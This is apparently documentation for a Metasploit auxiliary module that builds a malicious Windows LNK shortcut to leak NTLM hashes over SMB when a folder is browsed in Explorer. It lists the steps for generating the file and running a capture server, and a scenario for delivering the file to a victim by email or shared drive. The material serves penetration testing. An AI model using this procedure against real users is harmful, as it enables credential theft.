Path: blob/master/documentation/modules/auxiliary/fileformat/specialfolder_leak.md
23592 views
Vulnerable Application
Windows operating systems that process LNK files via Explorer, particularly when browsing directories containing the malicious shortcut. This can lead to NTLM credential leaks over SMB.
References:
Disclosure Date: 2025-05-10 (reported to MSRC).
Verification Steps
Start msfconsole.
Load the module:
use auxiliary/fileformat/specialfolderdatablock_lnk.Customize options as needed (e.g., set FILENAME or APPNAME).
Execute the module:
run.A malicious LNK file will be generated.
If not using a custom UNCPATH, the module starts an SMB capture server automatically.
Place the LNK file in a directory on the target system.
Browse to the directory in Windows Explorer to trigger the SMB connection.
Monitor the console for captured NTLM hashes.
Options
APPNAME
Sets the display name of the application in the LNK file. If empty, a random name is generated.
Example:
Scenarios
Basic NTLM Hash Capture on Windows
Target: A Windows system with Explorer (e.g., Windows 10 or later).
Attacker: Use the module to generate the LNK and capture hashes locally.
Deliver the malicious.lnk file to the target (e.g., via email or shared drive). When the victim opens the containing folder in Explorer, an SMB connection is attempted: